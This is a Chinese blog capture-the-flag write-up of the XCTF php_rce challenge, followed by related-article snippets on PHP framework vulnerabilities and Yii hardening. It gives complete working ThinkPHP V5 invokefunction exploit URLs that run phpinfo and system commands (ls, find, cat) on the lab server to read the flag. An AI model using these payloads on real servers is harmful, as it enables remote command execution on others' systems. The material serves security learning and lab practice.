PHP框架漏洞

利用ThinkPHPV5框架漏洞进行远程代码执行
最新推荐文章于 2025-03-25 00:31:05 发布
原创 最新推荐文章于 2025-03-25 00:31:05 发布 · 3.1k 阅读 · 7 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#php #html5 #html

该博客讲述了如何利用ThinkPHPV5框架的系统命令执行漏洞进行远程代码执行,通过github查找相关漏洞,利用phpinfo和system命令获取服务器信息,并尝试使用ls和find命令查找敏感文件,最终成功定位并读取了目标文件。

来自XCTF的php_rce.(RCE就是远程入侵检测,包括代码注入和命令执行漏洞)

很奇特的一个页面。我们知道ThinkPHP V5是一个PHP框架,于是我们到github上寻找这个框架的漏洞,这是一个很好的思路点,上github上找框架的漏洞。 

 

 那这么多漏洞我们选择哪个呢?我们看到了熟悉的system和phpinfo这两条。system对我们很有用,后面哪个vars[1][]=命令。

例如我们执行:

phpinfo()icon-default.png?t=L9C2http://111.200.241.244:55994/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1会出现

下面这个显示版本信息的页面。 

 

在输入查看本级目录的命令:

http://111.200.241.244:55994/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20. 

 http://111.200.241.244:55994/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=find / -name "flag"

尝试输入find / -name "flag"去查找一个flag文件的地方,有时候可能需要我们用正则表达式flag.*去试试,但是有时候正则表达式又不行,所以保险起见,这两种情况都试试。

 这就找到了文件所在地。 

然后就可以用cat命令查看了。 这也有点小问题,找到文件所在地是/flag/flag,但是输入cat /flag/flag却没反应。

相反,当我输入cat /flag的时候却出现了正确结果。 

 

PHP常用框架漏洞
小小猪的博客
08-14 3539
PHP常用框架漏洞 PHP框架 laraval介绍: Laravel基于MVC架构,可以满足诸如事件处理、用户身份验证等各种需求,同时通过包管理实现模块化和可扩展的代码,并且对数据库管理有着健壮的支持。 漏洞: 1. Laravel 配置文件泄露 2. Laravel <= 8.4.2 存在远程代码执行漏洞 3. Laravel 存在SQL注入漏洞 4. Laravel 反序列化漏洞 CakePHP 介绍: ...
海豚php框架漏洞,代码审计 - dolphin.pro cms SQL注入漏洞,Bypass过滤规则
weixin_39900736的博客
03-17 1247
Dolphin是一个网络软件平台,你可以下载并使用它来建立你自己的利基社交网络、社区网站、在线俱乐部或基于兴趣的社交网站。代码分析:1./flash/modules/chat/inc/actions.inc.php Line 120Line10:$sId = isset($_REQUEST['id']) ? process_db_input($_REQUEST['id']) : "";.........
ThinkPHP框架漏洞
谢公子的博客
04-08 3504
ThinkPHP ThinkPHP是为了简化企业级应用开发和敏捷WEB应用开发而诞生的。最早诞生于2006年初,原名为FCS,2007年元旦正式更名为ThinkPHP,并且遵循Apache2开源协议发布,从Struts结构移植过来并做了改进和完善,同时也借鉴了国外很多优秀的框架和模式,使用面向对象的开发结构和MVC模式,融合了Struts的思想和TagLib(标签库)、RoR的ORM映射和Act...
PHP漏洞挖掘(八):PHP框架漏洞分析详解——课程资源
W小哥
05-06 403
csdn我的资源: 目录: 1-1 课程框架介绍 1-2 ThinkPHP3.2 信息泄露分析 1-3 ThinkPHP3.2 数据库操作内核分析 1-4 ThinkPHP3.2 UPDATE注入漏洞详解 1-5 ThinkPHP3.2 find注入漏洞讲解 1-6 ThinkPHP3.2 order注入漏洞讲解 1-7 ThinkPHP3.2 简单逻辑漏洞 2-1 ThinkPHP5.X 数据库操作内核分析 2-2 ThinkPHP5.0.9 sql注入分析 2-3 ThinkPHP5.0.15 upda
ThinkPHP开发框架曝安全漏洞,超过4.5万家中文网站受影响
mozhe_的博客
12-27 470
据外媒ZDNet报道,近期有超过4.5万家中文网站被发现容易遭到来自黑客的攻击,而导致这一安全风险出现的根源竟然是一个ThinkPHP漏洞。 报道称,有多家网络安全公司在近期都发现了针对运行着基于ThinkPHP的Web应用程序的服务器的扫描活动。ThinkPHP是一个快速、兼容而且简单的轻量级国产PHP开发框架,支持Windows/Unix/Linux等服务器环境,以及MySql、PgSQL、...
PHP漏洞挖掘(八):PHP框架漏洞分析详解——课程资源百度网盘下载.txt
05-06
PHP漏洞挖掘(八):PHP框架漏洞分析详解——课程资源百度网盘下载,亲测真实有效可用!包含视频+课程资料.zip,在知识星球中也分享了该资源,知识星球:W小哥
海豚php框架漏洞,Dolphin 7.3.2 认证绕过与命令执行漏洞
weixin_42401025的博客
03-17 1118
#!/usr/bin/env python# -*- coding: utf-8 -*-'''Software : Dolphin <= 7.3.2 Auth bypass / RCE exploitVendor : www.boonex.comAuthor : Ahmed sultan (0x4148)Home : 0x4148.com | https://www.linkedin.com...
常见框架漏洞(一)----Thinkphp(TP)
qq_65379983的博客
03-25 1115
远程代码执行
海豚php框架漏洞,Thinkphp框架任意代码执行漏洞利用及修复
weixin_28941265的博客
03-17 1296
ThinkPHP是一个开源的PHP框架, 是为了简化企业级应用开发和敏捷WEB应用开发而诞生的。最早诞生于2006年初,原名FCS,2007年元旦正式更名为ThinkPHP,并且遵循 Apache2开源协议发布。早期的思想架构来源于Struts,后来经过不断改进和完善,同时也借鉴了国外很多优秀的框架和模式,使用面向对象的开发结 构和MVC模式,融合了Struts的Action和Dao思想和JSP的...
PHP程序中的常见漏洞
KHN_Fire的博客
03-07 599
由于原文比较长,而且有相当一部分是介绍文章的背景或PHP的基础知识,没有涉及到PHP安全方面的内容,因此我没有翻译。如果你想了解这方面的知识,请参考原文。   文章主要从全局变量,远程文件,文件上载,库文件,Session文件,数据类型和容易出错的函数这几个方面分析了PHP的安全性,并且对如何增强PHP的安全性提出了一些有用的建议。   好了,废话少说,我们言归正传!   [全局
php常见的45漏洞及解决方案
qqrrjj2011的博客
03-06 6363
php常见45漏洞及解决方案
PHPPHP网站常见一些安全漏洞及防御方法
A1_3_9_7的博客
02-23 2328
一、常见PHP网站安全漏洞对于PHP漏洞,目前常见的漏洞有五种。分别是Session文件漏洞、SQL注入漏洞、脚本命令执行漏洞、全局变量漏洞和文件漏洞。这里分别对这些漏洞进行简要的介绍。1、session文件漏洞Session攻击是黑客最常用到的攻击手段之一。当一个用户访问某一个网站时,为了免客户每进人一个页面都要输人账号和密码,PHP设置了Session和Cookie用于方便用户的使用和访向。2、SQL注入漏洞
海豚php有没有漏洞,谁帮助一下我 看看这个PHP有没有攻击漏洞
weixin_39540934的博客
03-23 418
该楼层疑似违规已被系统折叠隐藏此楼查看此楼function SingleDecToHex($dec){$dec=$dec%16;if($dec<10)return $tmp.$dec;$arr=array('a','b','c','d','e','f');return $tmp.$arr[$dec-10];}function SetToHexString($str){if(!$str)re...
php模板注入漏洞,74CMS前台模板引擎注入漏洞漏洞复现
weixin_32000561的博客
04-15 644
74CMS 曝高危漏洞,攻击者只需注册会员账号,上传一份包含恶意内容的简历,即可控制网站服务器,进行任意操作。漏洞复现.jpg74CMS 又称 “骑士 CMS ”,是一项以 PHP 和 MySQL 为核心开发的一套免费并开源的专业人才网站系统。软件具有执行效率高、模板自由切换、后台管理功能方便等诸多优秀特点。74CMS 多应用于大型人才招聘网站,网站中通常会含有大量会员个人简历等私密信息,因此,该...
php常见漏洞
qq_36232967的博客
06-20 660
此外,及时更新和修复依赖组件和框架也是保持应用程序安全的关键。会话劫持和固定:会话劫持是指攻击者窃取有效用户会话标识符,然后冒充合法用户访问系统。会话固定是指攻击者在不合法获取会话标识符的情况下,通过伪造会话标识符欺骗服务器信任他们。文件包含漏洞:文件包含漏洞出现在代码中使用用户可控参数来加载外部文件的情况下,攻击者可以通过构造恶意路径或文件名来加载任意文件并执行其中的代码,从而导致服务器被入侵。跨站脚本攻击(XSS):XSS 漏洞是指攻击者通过在网页中注入恶意脚本,从而在用户浏览器中执行恶意代码。
海豚php有没有漏洞,Dolphin 7.1.2 SQL注入漏洞
weixin_36030121的博客
03-23 765
发布日期:2013-06-12更新日期:2013-06-27受影响系统:boonex Dolphin <= 7.1.2描述:--------------------------------------------------------------------------------CVE(CAN) ID: CVE-2013-3638Dolphin是社区网站构建软件平台。Dolphin没有充...
常见框架漏洞
Hacker0830的博客
04-13 2632
原理:当用户勾选RememberMe并登录成功,Shiro会将用户的cookie值序列化,AES加密,接着base64编码后存储在cookie的rememberMe字段中,服务端收到登录请求后,会对rememberMe的cookie值进行base64解码,接着进行AES解密,然后反序列化。S2-059:攻击者可以通过构造恶意的OGNL表达式,并将其设置到可被外部输入进行修改,且会执行OGNL表达式的Struts2标签的属性值,引发OGNL表达式解析,最终造成远程代码执行的影响。
PHP网站常见一些安全漏洞及防御方法_php
Karka_的博客
06-20 719
一、常见PHP网站安全漏洞对于PHP漏洞,目前常见的漏洞有五种。分别是Session文件漏洞、SQL注入漏洞、脚本命令执行漏洞、全局变量漏洞和文件漏洞。这里分别对这些漏洞进行简要的介绍。1、session文件漏洞Session攻击是黑客最常用到的攻击手段之一。当一个用户访问某一个网站时,为了免客户每进人一个页面都要输人账号和密码,PHP设置了Session和Cookie用于方便用户的使用和访向。2、SQL注入漏洞
yii框架漏洞
最新发布
07-11
Yii框架作为一款广泛使用的PHP开发框架,提供了许多内置的安全特性来帮助开发者抵御常见的Web安全威胁。然而,与其他软件一样,Yii框架也曾发现过一些安全漏洞,这些漏洞通常在官方发布补丁后得到修复。 ### Yii框架常见安全漏洞及修复方案 #### 1. 跨站请求伪造(CSRF) Yii框架通过提供CSRF防护机制来防止此类攻击。默认情况下,Yii的表单组件会自动包含一个CSRF令牌,并在提交时验证该令牌的有效性[^1]。为确保应用安全,开发者应始终启用并正确配置`yii\web\Request::enableCsrfValidation`选项。 ```php // 在配置文件中启用CSRF保护 'request' => [ 'enableCsrfValidation' => true, ], ``` #### 2. SQL注入 Yii框架的数据库抽象层支持参数化查询,这有助于防止SQL注入攻击。开发者应避免手动拼接SQL语句,而是使用Active Record或Query Builder等安全接口进行数据库操作[^3]。 ```php // 使用Active Record安全地查询数据 $user = User::find()->where(['username' => $username])->one(); ``` #### 3. 跨站脚本攻击(XSS) 为了防范XSS攻击,Yii框架提供了输出编码功能,可以对HTML、URL、JavaScript等内容进行转义处理。开发者应在视图中使用`yii\helpers\Html::encode()`方法对用户输入内容进行编码后再输出到页面上[^1]。 ```php // 输出用户输入内容时进行HTML编码 echo \yii\helpers\Html::encode($userInput); ``` #### 4. 文件上传漏洞 Yii框架允许开发者通过设置白名单的方式限制上传文件的类型和大小,从而降低文件上传带来的安全隐患。建议将上传目录置于非Web根目录下,并禁用该目录中的脚本执行权限[^1]。 ```php // 配置文件上传规则 $uploadPath = Yii::getAlias('@app/upload/'); if ($model->validate()) { $model->file->saveAs($uploadPath . $model->file->baseName . '.' . $model->file->extension); } ``` #### 5. 安全头部配置 虽然这不是Yii框架本身的功能,但开发者可以通过配置服务器(如Nginx或Apache)添加HTTP安全头来增强应用的安全性。例如,设置`Content-Security-Policy`以防止未经授权的脚本执行,或者启用`X-Frame-Options`来防止点击劫持攻击[^3]。 ```nginx # Nginx配置示例:添加HTTP安全头部 add_header X-Content-Type-Options "nosniff"; add_header X-Frame-Options "SAMEORIGIN"; add_header X-XSS-Protection "1; mode=block"; ``` #### 6. 安全更新与版本管理 开发者应定期检查Yii框架的官方公告,及时升级至最新稳定版本以获取最新的安全补丁。对于依赖库,也应保持其更新状态,避免使用已知存在漏洞的旧版本[^2]。 --- ###
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

ad_m1n

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值